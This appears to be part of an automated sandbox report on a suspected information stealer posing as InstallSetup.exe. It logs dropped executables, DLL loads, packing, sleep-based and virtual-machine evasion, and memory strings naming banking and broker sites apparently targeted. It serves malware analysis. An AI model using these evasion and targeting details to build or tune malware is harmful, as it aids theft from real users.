        Source: C:\Users\user\Desktop\InstallSetup.exeProcess created: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe "C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe" Jump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: acgenral.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: samcli.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: msacm32.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: aclayers.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: msimg32.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: msvcr100.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeSection loaded: pcacli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: acgenral.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: samcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: msacm32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: aclayers.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: msimg32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: msvcr100.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: webio.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

        Data Obfuscation

        barindex
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeUnpacked PE file: 3.2.C7B4.tmp.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
        Source: C:\Users\user\Desktop\InstallSetup.exeUnpacked PE file: 0.2.InstallSetup.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeUnpacked PE file: 3.2.C7B4.tmp.exe.400000.0.unpack
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC5E
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_00410766 push ecx; ret 0_2_00410779
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_0040FD8C push ecx; ret 0_2_0040FD9F
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_0097799F push esp; retf 0_2_009779A7
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_009509CD push ecx; ret 0_2_009509E0
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_0097DDDE push dword ptr [esp+ecx-75h]; iretd 0_2_0097DDE2
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_00979DE8 pushad ; retf 0_2_00979DEF
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_0095CE18 push ss; retf 0_2_0095CE1D
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_00977F9D push esp; retf 0_2_00977F9E
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_0094FFF3 push ecx; ret 0_2_00950006
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_00C042AD push 00000003h; ret 0_2_00C042B1
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_00C02502 push es; iretd 0_2_00C02513
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_00C03E0C pushad ; ret 0_2_00C03E34
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0043D810 push eax; mov dword ptr [esp], 707F7E0Dh3_2_0043D812
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_00443469 push ebp; iretd 3_2_0044346C
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0044366E push 9F00CD97h; ret 3_2_004436B1
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_0043AE30 push eax; mov dword ptr [esp], 1D1E1F10h3_2_0043AE3E
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_004477A5 push ebp; iretd 3_2_004477AA
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_009AB097 push eax; mov dword ptr [esp], 1D1E1F10h3_2_009AB0A5
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_00993A79 push esp; iretd 3_2_00993A7C
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_009ADA77 push eax; mov dword ptr [esp], 707F7E0Dh3_2_009ADA79
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_00A56835 push ss; retf 3_2_00A56823
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_00A524F3 push 00000039h; ret 3_2_00A5253B
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_00A524CD push 00000039h; ret 3_2_00A5253B
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_00A54408 push ebp; ret 3_2_00A5440B
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_00A52464 push 00000039h; ret 3_2_00A5253B
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_00A567B2 push ss; retf 3_2_00A56823
        Source: InstallSetup.exeStatic PE information: section name: .text entropy: 7.547124008280789
        Source: ScreenUpdateSync[1].exe.0.drStatic PE information: section name: .text entropy: 7.372861140072552
        Source: C7B4.tmp.exe.0.drStatic PE information: section name: .text entropy: 7.372861140072552
        Source: C:\Users\user\Desktop\InstallSetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exeJump to dropped file
        Source: C:\Users\user\Desktop\InstallSetup.exeFile created: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeJump to dropped file
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_0040E974 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0040E974
        Source: C:\Users\user\Desktop\InstallSetup.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeWindow / User API: threadDelayed 427Jump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeWindow / User API: threadDelayed 9558Jump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-65674
        Source: C:\Users\user\Desktop\InstallSetup.exeAPI coverage: 5.6 %
        Source: C:\Users\user\Desktop\InstallSetup.exe TID: 2952Thread sleep count: 427 > 30Jump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exe TID: 2952Thread sleep time: -308294s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exe TID: 2952Thread sleep count: 9558 > 30Jump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exe TID: 2952Thread sleep time: -6900876s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe TID: 4216Thread sleep time: -150000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
        Source: C:\Users\user\Desktop\InstallSetup.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\InstallSetup.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_004389F2 FindFirstFileExW,0_2_004389F2
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_00978C59 FindFirstFileExW,0_2_00978C59
        Source: C:\Users\user\Desktop\InstallSetup.exeFile opened: C:\Users\user\AppData\Jump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Jump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Jump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeFile opened: C:\Users\user\Jump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Jump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\track_prt[1].htmJump to behavior
        Source: C7B4.tmp.exe, 00000003.00000003.1639316693.000000000310B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696494690p
        Source: Amcache.hve.7.drBinary or memory string: VMware
        Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
        Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
        Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
        Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
        Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
        Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
        Source: Amcache.hve.7.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
        Source: InstallSetup.exe, 00000000.00000002.3922562911.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, InstallSetup.exe, 00000000.00000002.3922562911.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000002.1818378078.0000000000AC5000.00000004.00000020.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000002.1818378078.0000000000A7D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: Amcache.hve.7.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
        Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
        Source: Amcache.hve.7.drBinary or memory string: vmci.sys
        Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
        Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
        Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
        Source: Amcache.hve.7.drBinary or memory string: VMware20,1
        Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Generation Counter
        Source: Amcache.hve.7.drBinary or memory string: NECVMWar VMware SATA CD00
        Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Device
